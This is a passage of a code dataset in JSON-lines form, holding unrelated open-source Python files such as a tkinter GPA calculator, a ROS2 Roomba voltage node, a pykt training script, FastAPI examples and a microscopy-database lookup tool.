:\r\n grade = \"Very Weak\"\r\n f_color = \"purple\"\r\n let = \"F\"\r\n else :\r\n grade = \"asd\"\r\n let = \"asd\"\r\n\r\n\r\n\r\n GPA_Display.configure(text = round(gpa ,3))\r\n Grade_Display.configure(text = grade ,fg = f_color)\r\n Letter.configure(text = let)\r\n\r\n else :tkinter.messagebox.showwarning(\"Warning !\" ,\"You must add a course to be calculated\")\r\n\r\ndef New():\r\n global check ,Courses_Number\r\n CheckBtn.deselect()\r\n Courses_Number = 0\r\n Percentage_Entry.delete(0,END)\r\n Percentage_Entry.configure(state = DISABLED)\r\n Literal_Options.grid(row = 0 ,column = 1)\r\n check = \"L\"\r\n Courses_Number_Display.configure(text = \"\")\r\n Hours_Number_Display.configure(text = \"\")\r\n GPA_Display.configure(text = \"\")\r\n Grade_Display.configure(text = \"\")\r\n Letter.configure(text = \"\")\r\n \r\n ScoreList.clear()\r\n HoursList.clear()\r\n TotalList.clear()\r\n\r\ndef About():\r\n root.maxsize(width = 280 ,height = 400)\r\n Photo_lbl.pack(side = BOTTOM)\r\n tkinter.messagebox.showinfo(\"\" ,\"Created by :\\nMohammed Raafat Ibrahim\\n\\nWe don't forget our classmate Amr Hendy\")\r\n Photo_lbl.pack_forget()\r\n root.maxsize(width = 280 ,height = 270)\r\n\r\n#*********************************************************************************************************************************************************************************\r\n#***************ROOT***************************ROOT*************************ROOT*************************** ROOT ************************************************************ ROOT\r\n#*********************************************************************************************************************************************************************************\r\nroot = Tk()\r\nroot.title(\"GPA Calculator\")\r\n\r\nletter = StringVar()\r\nletter.set(\"A+\")\r\nhours = IntVar()\r\nCourse_Score = IntVar()\r\nScoreList = []\r\nHoursList = []\r\nTotalList = []\r\nLiteral_Points = {'A+':4.0,'A':3.75,'B+':3.4,'B':3.1,'C+':2.75,'C':2.5,'D+':2.2,'D':2.0,'F':1.0}\r\n\r\n#*********************************************************************************************************************************************************************************\r\n#***************Top Frame***************************Top Frame**********************Top Frame***************************** Top Frame ************************************ Top Frame\r\n#*********************************************************************************************************************************************************************************\r\nTop_Frame = Frame(root)\r\nTop_Frame.pack(side = TOP)\r\n\r\nCourse_Score_Hours = LabelFrame(Top_Frame ,relief = FLAT)\r\nCourse_Score_Hours.pack(side = TOP )\r\n\r\nCourse_Score_LabelFrame = LabelFrame(Course_Score_Hours ,text = \"Course Score\")\r\nCourse_Score_LabelFrame.pack(side = LEFT ,padx = 5)\r\n\r\nHours_lblFrame = LabelFrame(Course_Score_Hours ,text = \"Course Hours\")\r\nHours_lblFrame.pack(side = RIGHT ,padx = 5)\r\n\r\nLabel(Course_Score_LabelFrame ,text = \"Literal Grade\").grid(row =0)\r\n\r\nCheckBtn = Checkbutton(Course_Score_LabelFrame ,text = \"Percentage \" ,variable = Course_Score ,onvalue = 1 ,offvalue = 0 ,command = Choice)#Check Button\r\nCheckBtn.grid(row = 1)\r\n\r\nPercentage_Entry = Entry(Course_Score_LabelFrame ,width = 5 ,state = DISABLED) #Percentage Entry ***************************************** Percentage Entry\r\nPercentage_Entry.grid(row = 1 ,column = 1)\r\n\r\nLabel(Course_Score_LabelFrame ,text = \"%\").grid(row = 1 ,column = 3)\r\n\r\nLiteral_Options = OptionMenu(Course_Score_LabelFrame ,letter ,\"A+\" ,\"A\" ,\"B+\" ,\"B\" ,\"C+\" ,\"C\" ,\"D+\" ,\"D\" ,\"F\" )#Opthin Menu ************** Opthin Menu\r\nLiteral_Options.grid(row = 0 ,column = 1)\r\n\r\nRadiobutton(Hours_lblFrame ,text = \"2\" ,variable = hours ,value = 2).pack(side = LEFT) #Radio Button for hour 2 ************************** Radio Button for hour 2\r\nHours_RadioBtn = Radiobutton(Hours_lblFrame ,text = \"3\" ,variable = hours ,value = 3) #Radio Button for hour 2 *************************** Radio Button for hour 2\r\nHours_RadioBtn.pack(side = RIGHT)\r\nHours_RadioBtn.select()\r\n\r\nGPA_Grade_Frame = Frame(Top_Frame ,relief = FLAT)\r\nGPA_Grade_Frame.pack(side = BOTTOM ,pady = 5)\r\n\r\nButton(GPA_Grade_Frame ,text = \"Add Course\" ,command = Add_Course ,bg = \"#e6e6e6\").grid(row = 0 ,pady = 5) #******************************* Add Course Button\r\n\r\nButton(GPA_Grade_Frame ,text = \"Undo\" ,command = Undo).grid(row = 1) #Undo Button ********************************************************* Undo Button\r\n\r\nLabel(GPA_Grade_Frame ,text = \"Courses No. :\").grid(row = 0 ,column = 1 ,pady = 2)\r\nCourses_Number_Display = Label(GPA_Grade_Frame ,relief = RIDGE ,width = 2) #Courses No. Display ******************************************* Courses No. Display\r\nCourses_Number_Display.grid(row = 0, column = 2 ,pady = 2)\r\n\r\nLabel(GPA_Grade_Frame ,text = \"Hours No. :\").grid(row = 1 ,column = 1 ,pady = 2)\r\nHours_Number_Display = Label(GPA_Grade_Frame ,relief = RIDGE ,width = 2) #Hours No. Display *********************************************** Hours No. Display\r\nHours_Number_Display.grid(row = 1 ,column = 2 ,pady = 2)\r\n\r\nButton(GPA_Grade_Frame ,text = \"Calculate GPA\" ,width = 15 ,command = Caculate_GPA ,bg = \"#d2d2d2\").grid(row = 2 ,columnspan = 3 ,pady = 5) #Calculate GPA Button\r\n\r\nLabel(GPA_Grade_Frame ,text = \"GPA :\").grid(row = 3)\r\n\r\nGPA_Display = Label(GPA_Grade_Frame ,relief = RIDGE ,width = 15) #GPA Display ************************************************************** GPA Display\r\nGPA_Display.grid(row = 3 ,column = 1)\r\n\r\nLabel(GPA_Grade_Frame ,text = \"Grade :\").grid(row = 4)\r\nGrade_Display = Label(GPA_Grade_Frame ,relief = RIDGE ,width = 15) #Grade Display ********************************************************** Grade Display\r\nGrade_Display.grid(row = 4 ,column = 1)\r\n\r\nLetter = Label(GPA_Grade_Frame ,relief = RIDGE ,width = 2) #Letter Display ***************************************************************** Letter Display\r\nLetter.grid(row = 3 ,rowspan = 2 ,column = 3)\r\n\r\n#*********************************************************************************************************************************************************************************\r\n#***************Bottom Frame***************************Bottom Frame**********************Bottom Frame*************************** Bottom Frame *********************** Bottom Frame\r\n#*********************************************************************************************************************************************************************************\r\n\r\nBottom_Frame = Frame(root)\r\nBottom_Frame.pack(side = BOTTOM)\r\n\r\nButtons_LabelFrame = LabelFrame(Bottom_Frame ,relief = FLAT)\r\nButtons_LabelFrame.pack(side = TOP ,pady = 5)\r\n\r\nButton(Buttons_LabelFrame ,text = \" New \" ,command = New ,bg = \"#e6e6e6\").pack(side =LEFT ,padx = 15) #New Button ************************* New Button\r\n\r\nButton(Buttons_LabelFrame ,text = \"About\" ,command = About ,bg = \"#e6e6e6\").pack(side = RIGHT ,padx = 15) #About Button ******************** About Button\r\n\r\nPhoto = PhotoImage(file = \"Amr.png\") #Photo ************************************************************************************************* Photo\r\nPhoto_lbl = Label(Bottom_Frame ,image = Photo)\r\n\r\n#root.maxsize(width= 280 ,height = 270)\r\nroot.minsize(width= 280 ,height = 270)\r\n\r\nroot.mainloop()\r\n","repo_name":"Mohammed-Raafat/GPA-Calculator","sub_path":"GPA Calculator.py","file_name":"GPA Calculator.py","file_ext":"py","file_size_in_byte":11856,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"29996712525","text":"import sys\ninput = sys.stdin.readline\n\ntc = int(input())\n\nfor _ in range(tc):\n flag = False\n n = int(input())\n numbers = [input().strip() for i in range(n)] \n numbers.sort()\n print(numbers)\n for i in range(n-1):\n num1 = numbers[i]\n len1 = len(num1)\n for j in range(i+1, n):\n num2 = numbers[j]\n # print(num1, num2)\n if len(num2) > len1:\n if num2[:len1] == num1:\n print('NO')\n flag = True\n break\n if flag:\n break\n if flag == False:\n print('YES')\n\nfor i in range(7, 5):\n print('ds')","repo_name":"bud386/algo-CS","sub_path":"백준_문자열/5052_��화번호목록.py","file_name":"5052_전화번호목록.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"27171020853","text":"# dispvolt_node.py\n# ルンバのバッテリー電圧をルンバのLEDに表示するノード\n# https://demura.net/robot/ros2/20748.html を参考にしています。\nimport rclpy # ROS2のPythonモジュールをインポート\nfrom rclpy.node import Node # rclpy.nodeモジュールからNodeクラスをインポート\nfrom std_msgs.msg import Float32 # トピック通信に使うFloat32メッセージ型をインポート\nfrom std_msgs.msg import UInt8MultiArray # トピック通信に使うUInt8MultiArrayメッセージ型をインポート\n\nclass DispVolt(Node): \n \"\"\"ルンバのバッテリー電圧のトピックbattery/voltageをサブスクライブしてLEDに表示するクラス \n \"\"\"\n def __init__(self):\n \"\"\"コンストラクタ。サブスクライバーを生成する。\n \"\"\"\n # Nodeクラスのコンストラクタを呼び出し、'disp_volt_node'というノード名をつける。\n super().__init__('disp_volt_node') \n # サブスクライバーの生成。create_subscriptionの1番目の引数Float32はトピック通信に使うメッセージ型。 \n # 2番目の引数'battery/voltage'はトピック名。\n # 3番目の引数はコールバック関数。 4番目の引数はキューのサイズ。\n self.subscription = self.create_subscription(Float32,'battery/voltage', self.listener_callback, 10)\n # パブリッシャーの生成。create_publisherの1番目の引数はトピック通信に使うメッセージ型。\n # UInt8MultiArray型はLEDに表示するASCIIコードとして通信に使われる。\n # 2番目の引数'set_ascii'はトピック名。\n # 3番目の引数はキューのサイズ。キューサイズはQOS(quality of service)の設定に使われる。\n # サブスクライバーがデータを何らかの理由で受信できないときのキューサイズの上限となる。\n self.publisher = self.create_publisher(UInt8MultiArray,'set_ascii', 10)\n # UInt8MultiArrayメッセージ型オブジェクトの生成。\n self.led = UInt8MultiArray()\n print(\"*** dispvolt node ***\")\n \n \n def listener_callback(self, Float32): \n \"\"\"サブスクライバーのコールバック関数。端末にVoltageを表示し、LED表示メッセージをpublishする。\n \"\"\"\n self.get_logger().info(\"Voltage: %f\" % (Float32.data))\n # LEDに表示するためのASCIIコードのリストを作る。\n self.led.data = [] # リストを空にする。 \n volt_str = str(Float32.data * 100) # 小数点は不要なので100倍して4桁にしておく。\n for chardata in volt_str[:4]: # 先頭から4文字までを取り出しASCIIコードのリストにする。\n self.led.data.append(ord(chardata))\n # LED表示メッセージをパブリッシュ(送信)する。\n self.publisher.publish(self.led)\n \n \ndef main(args=None):\n rclpy.init(args=args) # rclpyモジュールの初期化\n disp_volt = DispVolt() # ノードの作成\n rclpy.spin(disp_volt) # コールバック関数が呼び出し\n disp_volt.destory_node() # ノードの破壊\n rclpy.shutdown() # rclpyモジュールの終了処理\n\nif __name__ == '__main__':\n main()","repo_name":"kanpapa/roomba","sub_path":"dispvolt/dispvolt/dispvolt_node.py","file_name":"dispvolt_node.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"41474463790","text":"import os\nimport argparse\nimport json\n\nimport torch\ntorch.set_num_threads(4) \nfrom torch.optim import SGD, Adam\nimport copy\n\nfrom pykt.models import train_model,evaluate,init_model\nfrom pykt.utils import debug_print,set_seed\nfrom pykt.datasets import init_dataset4train\nimport datetime\n\nos.environ['CUDA_LAUNCH_BLOCKING'] = \"1\"\ndevice = \"cpu\" if not torch.cuda.is_available() else \"cuda\"\nos.environ['CUBLAS_WORKSPACE_CONFIG']=':4096:2'\n\ndef save_config(train_config, model_config, data_config, params, save_dir):\n d = {\"train_config\": train_config, 'model_config': model_config, \"data_config\": data_config, \"params\": params}\n save_path = os.path.join(save_dir, \"config.json\")\n with open(save_path, \"w\") as fout:\n json.dump(d, fout)\n\ndef main(params):\n if \"use_wandb\" not in params:\n params['use_wandb'] = 1\n\n if params['use_wandb']==1:\n import wandb\n wandb.init()\n\n set_seed(params[\"seed\"])\n model_name, dataset_name, fold, emb_type, save_dir = params[\"model_name\"], params[\"dataset_name\"], \\\n params[\"fold\"], params[\"emb_type\"], params[\"save_dir\"]\n \n debug_print(text = \"load config files.\",fuc_name=\"main\")\n \n with open(\"../configs/kt_config.json\") as f:\n config = json.load(f)\n train_config = config[\"train_config\"]\n if model_name in [\"dkvmn\",\"deep_irt\", \"sakt\", \"saint\",\"saint++\", \"akt\", \"atkt\", \"lpkt\", \"skvmn\", \"dimkt\"]:\n train_config[\"batch_size\"] = 64 ## because of OOM\n if model_name in [\"simplekt\", \"bakt_time\", \"sparsekt\"]:\n train_config[\"batch_size\"] = 64 ## because of OOM\n if model_name in [\"gkt\"]:\n train_config[\"batch_size\"] = 16 \n if model_name in [\"qdkt\",\"qikt\"] and dataset_name in ['algebra2005','bridge2algebra2006']:\n train_config[\"batch_size\"] = 32 \n model_config = copy.deepcopy(params)\n for key in [\"model_name\", \"dataset_name\", \"emb_type\", \"save_dir\", \"fold\", \"seed\"]:\n del model_config[key]\n if 'batch_size' in params:\n train_config[\"batch_size\"] = params['batch_size']\n if 'num_epochs' in params:\n train_config[\"num_epochs\"] = params['num_epochs']\n # model_config = {\"d_model\": params[\"d_model\"], \"n_blocks\": params[\"n_blocks\"], \"dropout\": params[\"dropout\"], \"d_ff\": params[\"d_ff\"]}\n batch_size, num_epochs, optimizer = train_config[\"batch_size\"], train_config[\"num_epochs\"], train_config[\"optimizer\"]\n\n with open(\"../configs/data_config.json\") as fin:\n data_config = json.load(fin)\n if 'maxlen' in data_config[dataset_name]:#prefer to use the maxlen in data config\n train_config[\"seq_len\"] = data_config[dataset_name]['maxlen']\n seq_len = train_config[\"seq_len\"]\n\n print(\"Start init data\")\n print(dataset_name, model_name, data_config, fold, batch_size)\n \n debug_print(text=\"init_dataset\",fuc_name=\"main\")\n if model_name not in [\"dimkt\"]:\n train_loader, valid_loader, *_ = init_dataset4train(dataset_name, model_name, data_config, fold, batch_size)\n else:\n diff_level = params[\"difficult_levels\"]\n train_loader, valid_loader, *_ = init_dataset4train(dataset_name, model_name, data_config, fold, batch_size, diff_level=diff_level)\n\n params_str = \"_\".join([str(v) for k,v in params.items() if not k in ['other_config']])\n\n print(f\"params: {params}, params_str: {params_str}\")\n if params['add_uuid'] == 1 and params[\"use_wandb\"] == 1:\n import uuid\n # if not model_name in ['saint','saint++']:\n params_str = params_str+f\"_{ str(uuid.uuid4())}\"\n ckpt_path = os.path.join(save_dir, params_str)\n if not os.path.isdir(ckpt_path):\n os.makedirs(ckpt_path)\n print(f\"Start training model: {model_name}, embtype: {emb_type}, save_dir: {ckpt_path}, dataset_name: {dataset_name}\")\n print(f\"model_config: {model_config}\")\n print(f\"train_config: {train_config}\")\n\n if model_name in [\"dimkt\"]:\n # del model_config['num_epochs']\n del model_config['weight_decay']\n\n save_config(train_config, model_config, data_config[dataset_name], params, ckpt_path)\n learning_rate = params[\"learning_rate\"]\n for remove_item in ['use_wandb','learning_rate','add_uuid','l2']:\n if remove_item in model_config:\n del model_config[remove_item]\n if model_name in [\"saint\",\"saint++\", \"sakt\", \"atdkt\", \"simplekt\", \"bakt_time\"]:\n model_config[\"seq_len\"] = seq_len\n \n debug_print(text = \"init_model\",fuc_name=\"main\")\n print(f\"model_name:{model_name}\")\n model = init_model(model_name, model_config, data_config[dataset_name], emb_type)\n print(f\"model is {model}\")\n if model_name == \"hawkes\":\n weight_p, bias_p = [], []\n for name, p in filter(lambda x: x[1].requires_grad, model.named_parameters()):\n if 'bias' in name:\n bias_p.append(p)\n else:\n weight_p.append(p)\n optdict = [{'params': weight_p}, {'params': bias_p, 'weight_decay': 0}]\n opt = torch.optim.Adam(optdict, lr=learning_rate, weight_decay=params['l2'])\n elif model_name == \"iekt\":\n opt = torch.optim.Adam(model.parameters(), lr=learning_rate, weight_decay=1e-6)\n elif model_name == \"dimkt\":\n opt = torch.optim.Adam(model.parameters(),lr=learning_rate,weight_decay=params['weight_decay'])\n else:\n if optimizer == \"sgd\":\n opt = SGD(model.parameters(), learning_rate, momentum=0.9)\n elif optimizer == \"adam\":\n opt = Adam(model.parameters(), learning_rate)\n \n testauc, testacc = -1, -1\n window_testauc, window_testacc = -1, -1\n validauc, validacc = -1, -1\n best_epoch = -1\n save_model = True\n \n debug_print(text = \"train model\",fuc_name=\"main\")\n \n if model_name == \"rkt\":\n testauc, testacc, window_testauc, window_testacc, validauc, validacc, best_epoch = \\\n train_model(model, train_loader, valid_loader, num_epochs, opt, ckpt_path, None, None, save_model, data_config[dataset_name], fold)\n else:\n testauc, testacc, window_testauc, window_testacc, validauc, validacc, best_epoch = train_model(model, train_loader, valid_loader, num_epochs, opt, ckpt_path, None, None, save_model)\n \n if save_model:\n best_model = init_model(model_name, model_config, data_config[dataset_name], emb_type)\n net = torch.load(os.path.join(ckpt_path, emb_type+\"_model.ckpt\"))\n best_model.load_state_dict(net)\n\n print(\"fold\\tmodelname\\tembtype\\ttestauc\\ttestacc\\twindow_testauc\\twindow_testacc\\tvalidauc\\tvalidacc\\tbest_epoch\")\n print(str(fold) + \"\\t\" + model_name + \"\\t\" + emb_type + \"\\t\" + str(round(testauc, 4)) + \"\\t\" + str(round(testacc, 4)) + \"\\t\" + str(round(window_testauc, 4)) + \"\\t\" + str(round(window_testacc, 4)) + \"\\t\" + str(validauc) + \"\\t\" + str(validacc) + \"\\t\" + str(best_epoch))\n model_save_path = os.path.join(ckpt_path, emb_type+\"_model.ckpt\")\n print(f\"end:{datetime.datetime.now()}\")\n \n if params['use_wandb']==1:\n wandb.log({ \n \"validauc\": validauc, \"validacc\": validacc, \"best_epoch\": best_epoch,\"model_save_path\":model_save_path})\n","repo_name":"pykt-team/pykt-toolkit","sub_path":"examples/wandb_train.py","file_name":"wandb_train.py","file_ext":"py","file_size_in_byte":7159,"program_lang":"python","lang":"en","doc_type":"code","stars":144,"dataset":"github-code","pt":"34"} +{"seq_id":"3877280588","text":"from datetime import datetime\nfrom unittest.mock import patch\n\nfrom bson import ObjectId\nfrom fastapi.testclient import TestClient\n\nfrom test.endpoints.sessions.conftest import Session\n\n\nclass TestSaveSession:\n @patch(\"operationsgateway_api.src.routes.sessions.datetime\")\n def test_save_session(\n self,\n mock_datetime,\n test_app: TestClient,\n login_and_get_token,\n ):\n mock_datetime.now.return_value = datetime.fromisoformat(\"2023-06-01T13:00:00\")\n mock_datetime.strftime.return_value = datetime.strftime(\n mock_datetime.now.return_value,\n \"%Y-%m-%d %H:%M:%S\",\n )\n\n name = \"Test Saving Session\"\n summary = \"Test Summary\"\n auto_saved = False\n session_data = {\"data\": 1234, \"test\": \"5678\"}\n\n test_response = test_app.post(\n f\"/sessions?name={name}&summary={summary}&auto_saved={auto_saved}\",\n json=session_data,\n headers={\"Authorization\": f\"Bearer {login_and_get_token}\"},\n )\n\n assert test_response.status_code == 201\n\n # Check the response is a valid object ID\n session_id = test_response.json()\n ObjectId(session_id)\n\n test_session = Session()\n query_result = test_session.find_one(session_id)\n assert query_result is not None\n\n test_session.delete(session_id)\n","repo_name":"ral-facilities/operationsgateway-api","sub_path":"test/endpoints/sessions/test_save_session.py","file_name":"test_save_session.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"41994408555","text":"from __future__ import annotations\n\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtCore import Qt, pyqtSignal\nfrom PyQt5.QtWidgets import QGridLayout, QLabel, QScrollArea, QSizePolicy, QWidget\n\nfrom novelwriter.extensions.switch import NSwitch\n\n\nclass NSwitchBox(QScrollArea):\n \"\"\"Extension: Switch Box Widget\n\n A widget that can hold a list of switches with labels and optional\n icons. The switch toggles emits a common signal with a switch key.\n \"\"\"\n\n switchToggled = pyqtSignal(str, bool)\n\n def __init__(self, parent: QWidget, baseSize: int) -> None:\n super().__init__(parent=parent)\n self._index = 0\n self._hSwitch = baseSize\n self._wSwitch = 2*self._hSwitch\n self._sIcon = baseSize\n self._widgets = []\n self.clear()\n return\n\n def clear(self) -> None:\n \"\"\"Rebuild the content of the core widget.\"\"\"\n self._index = 0\n self._widgets = []\n\n self._content = QGridLayout()\n self._content.setColumnStretch(1, 1)\n\n self._widget = QWidget()\n self._widget.setSizePolicy(QSizePolicy.MinimumExpanding, QSizePolicy.Minimum)\n self._widget.setLayout(self._content)\n\n self.setWidgetResizable(True)\n self.setWidget(self._widget)\n\n return\n\n def addLabel(self, text: str) -> None:\n \"\"\"Add a header label to the content box.\"\"\"\n label = QLabel(text)\n font = label.font()\n font.setBold(True)\n label.setFont(font)\n self._content.addWidget(label, self._index, 0, 1, 3, Qt.AlignLeft)\n self._widgets.append(label)\n self._bumpIndex()\n return\n\n def addItem(self, qIcon: QIcon, text: str, identifier: str, default: bool = False) -> None:\n \"\"\"Add an item to the content box.\"\"\"\n icon = QLabel(\"\")\n icon.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n icon.setPixmap(qIcon.pixmap(self._sIcon, self._sIcon))\n self._content.addWidget(icon, self._index, 0, Qt.AlignLeft)\n\n label = QLabel(text)\n self._content.addWidget(label, self._index, 1, Qt.AlignLeft)\n\n switch = NSwitch(width=self._wSwitch, height=self._hSwitch)\n switch.setChecked(default)\n switch.toggled.connect(lambda state: self._emitSwitchSignal(identifier, state))\n self._content.addWidget(switch, self._index, 2, Qt.AlignRight)\n\n self._widgets.append(switch)\n self._bumpIndex()\n\n return\n\n def addSeparator(self) -> None:\n \"\"\"Add a blank entry in the content box.\"\"\"\n spacer = QWidget()\n spacer.setFixedHeight(int(0.5*self._sIcon))\n self._content.addWidget(spacer, self._index, 0, 1, 3, Qt.AlignLeft)\n self._widgets.append(spacer)\n self._bumpIndex()\n return\n\n def setInnerContentsMargins(self, left: int, top: int, right: int, bottom: int) -> None:\n \"\"\"Set the contents margins of the inner layout.\"\"\"\n self._content.setContentsMargins(left, top, right, bottom)\n return\n\n ##\n # Internal Functions\n ##\n\n def _emitSwitchSignal(self, identifier: str, state: bool) -> None:\n \"\"\"Emit a signal for a switch toggle.\"\"\"\n self.switchToggled.emit(identifier, state)\n return\n\n def _bumpIndex(self) -> None:\n \"\"\"Increase the index counter and make sure only the last\n columns is stretching.\n \"\"\"\n self._content.setRowStretch(self._index, 0)\n self._content.setRowStretch(self._index + 1, 1)\n self._index += 1\n return\n\n# END Class NSwitchBox\n","repo_name":"vkbo/novelWriter","sub_path":"novelwriter/extensions/switchbox.py","file_name":"switchbox.py","file_ext":"py","file_size_in_byte":3540,"program_lang":"python","lang":"en","doc_type":"code","stars":1592,"dataset":"github-code","pt":"34"} +{"seq_id":"73678508257","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# @Author : tangkaize\n#\n# _____ ______\n# ____==== ]OO|_n_n__][. | |]\n# [________]_|__|________)< \n# oo oo 'oo OOOO-| oo\\_ ~o~~~o~'\n# +--+--+--+--+--+--+--+--+--+--+--+--+--+\n# @Time : 2022/12/27 15:33\n# @FIle: demo10.py 额外的数据类型\n# @Software: PyCharm\nfrom datetime import datetime, timedelta, time\nfrom typing import Union\nfrom uuid import UUID\n\nimport uvicorn\nfrom fastapi import FastAPI, Body\n\napp = FastAPI()\n\n\n# 基本数据类型\n# int\n# float\n# str\n# bool\n# 其他数据类型¶\n# UUID\n# datetime.datetime\n# datetime.date\n# datetime.time\n# datetime.timedelta\n# frozenset\n# bytes\n# Decimal\n@app.put('/items/{item_id}')\nasync def read_items(item_id: UUID,\n start_datetime: Union[datetime, None] = Body(default=None),\n end_datetime: Union[datetime, None] = Body(default=None),\n repeat_at: Union[time, None] = Body(default=None),\n process_after: Union[timedelta, None] = Body(default=None)):\n start_process = start_datetime + process_after\n duration = end_datetime - start_process\n return {\n \"item_id\": item_id,\n \"start_datetime\": start_datetime,\n \"end_datetime\": end_datetime,\n \"repeat_at\": repeat_at,\n \"process_after\": process_after,\n \"start_process\": start_process,\n \"duration\": duration,\n }\n\n\nif __name__ == '__main__':\n uvicorn.run('demo10:app', host='0.0.0.0', port=8000, reload=True)\n","repo_name":"alex-oos/learn-python","sub_path":"samples/web/fastapi/base/demo10.py","file_name":"demo10.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7042547225","text":"#stack implementation using list\nstack = []\ndef push ():\n\n element=int(input(\"enter the element\"))\n stack.append(element)\n print(stack)\ndef pop_element ():\n if not stack :\n print(\"stack is empty\")\n else:\n e=stack.pop()\n print(\"Removed element:\",e)\n print(stack)\nwhile True :\n print(\"select operation 1.push 2.pop 3.quit\")\n choose=int(input())\n if choose==1:\n push()\n elif choose==2:\n pop_element()\n elif choose ==3:\n break\n else:\n print(\"Select the correct operation\")\n","repo_name":"Surya20233/Stack-implementation-by-using-list-linklist-Queue","sub_path":"c1.py","file_name":"c1.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"24138347136","text":"#! /usr/bin/env python\n\nimport os\nimport sys\nimport argparse\nimport ncmirtools\nimport logging\n\nfrom ncmirtools.lookup import MicroscopyProductLookupViaDatabase\nfrom ncmirtools.config import NcmirToolsConfig\nfrom ncmirtools.config import ConfigMissingError\nfrom ncmirtools import config\n\n\n# create logger\nlogger = logging.getLogger('ncmirtools.mpidinfo')\n\nNO_MICROSCOPY_PRODUCT_FOUND_MSG = 'No matching Microscopy Product found'\n\n\nclass Parameters(object):\n \"\"\"Placeholder class for parameters\n \"\"\"\n pass\n\n\ndef _parse_arguments(desc, args):\n \"\"\"Parses command line arguments using argparse.\n \"\"\"\n parsed_arguments = Parameters()\n\n help_formatter = argparse.RawDescriptionHelpFormatter\n parser = argparse.ArgumentParser(description=desc,\n formatter_class=help_formatter)\n parser.add_argument(\"mpid\", help='Microscopy product id (must be'\n 'an int less then 2^31)',\n type=int)\n parser.add_argument(\"--log\", dest=\"loglevel\", choices=['DEBUG',\n 'INFO', 'WARNING', 'ERROR', 'CRITICAL'],\n help=\"Set the logging level (default WARNING)\",\n default='WARNING')\n parser.add_argument(\"--homedir\", help='Sets alternate home directory '\n 'under which the ' +\n NcmirToolsConfig.UCONFIG_FILE +\n ' is loaded (default ~)',\n default='~')\n parser.add_argument('--version', action='version',\n version=('%(prog)s ' + ncmirtools.__version__))\n\n return parser.parse_args(args, namespace=parsed_arguments)\n\n\ndef _run_search_database(mpid, homedir):\n \"\"\"Performs search for directory\n :param prefixdir: Directory search path\n :param mpid: microscopy product id to use to find directory\n :returns: exit code for program\n \"\"\"\n try:\n config = NcmirToolsConfig()\n config.set_home_directory(os.path.expanduser(homedir))\n\n search = MicroscopyProductLookupViaDatabase(config.get_config())\n res = search.get_microscopyproduct_for_id(mpid)\n if res is not None:\n sys.stdout.write(res.get_as_string())\n return 0\n\n sys.stderr.write(NO_MICROSCOPY_PRODUCT_FOUND_MSG + os.linesep)\n return 1\n except ConfigMissingError:\n sys.stderr.write('\\nERROR: Configuration file missing.\\n'\n ' Please run mpidinfo.py --help for '\n 'information on how\\n to create a configuration '\n 'file\\n\\n')\n return 3\n except Exception:\n logger.exception(\"Error caught exception\")\n return 2\n\n\ndef main(arglist):\n con = NcmirToolsConfig()\n desc = \"\"\"\n Version {version}\n\n Given a this script searches the database for\n a Microscopy Product that has this .\n The matching Microscopy Product will be output in this format\n\n Id: \n\n Image Basename:\n\n \n\n Notes:\n\n \n\n If no Microscopy Product matches the is found this\n program will output to standard error the message\n '{mpnotfound}'\n and exit with value 1.\n\n If there is an unknown error this program will output a message\n and exit with value 2.\n\n If {config_file}\n is missing then this program will output a message and exit\n with value 3.\n\n Example Usage:\n\n mpidinfo.py 123\n\n Id: 123\n\n Image Basename:\n\n foo\n\n Notes:\n\n some notes\n\n\n NOTE:\n\n This script requires a configuration file which contains\n the information to connect to the database.\n\n For this account the file should be located in one of these\n paths:\n\n {config_file}\n\n and should have the following format:\n\n [{db}]\n {user} = \n {password} = \n {port} = \n {host} = \n {database} = \n\n \"\"\".format(version=ncmirtools.__version__,\n mpnotfound=NO_MICROSCOPY_PRODUCT_FOUND_MSG,\n db=NcmirToolsConfig.POSTGRES_SECTION,\n user=NcmirToolsConfig.POSTGRES_USER,\n password=NcmirToolsConfig.POSTGRES_PASS,\n port=NcmirToolsConfig.POSTGRES_PORT,\n host=NcmirToolsConfig.POSTGRES_HOST,\n database=NcmirToolsConfig.POSTGRES_DB,\n config_file=', '.join(con.get_config_files()))\n\n theargs = _parse_arguments(desc, arglist[1:])\n theargs.program = arglist[0]\n theargs.version = ncmirtools.__version__\n config.setup_logging(logger, loglevel=theargs.loglevel)\n try:\n return _run_search_database(theargs.mpid, theargs.homedir)\n finally:\n logging.shutdown()\n\n\nif __name__ == '__main__': # pragma: no cover\n sys.exit(main(sys.argv))\n","repo_name":"CRBS/ncmirtools","sub_path":"ncmirtools/mpidinfo.py","file_name":"mpidinfo.py","file_ext":"py","file_size_in_byte":5400,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"5206826537","text":"\"\"\"\n\"\"\"\n\nimport math\n\nt = int(input())\n\nfor i in range(t):\n n = int(input())\n z = 0\n\n count = 0\n while n/5 > 0:\n z = z + math.floor(n/5)\n n = n/5\n print(int(z))","repo_name":"Harish-Muralidhar/Benchmark_Test_To_Analyze_Performance_Of_Code_Generating_Foundation_Models","sub_path":"generated_codes/experiment_c/parameter_set_1/five_samples/python_files/18_3.py","file_name":"18_3.py","file_ext":"py","file_size_in_byte":189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"39858319860","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport inspect\n\nimport six\n\nfrom rakpy.io import convert_to_stream\nfrom rakpy.protocol.const import MAGIC\nfrom rakpy.protocol.exceptions import UnknownPacketException, RemainingDataException\nfrom 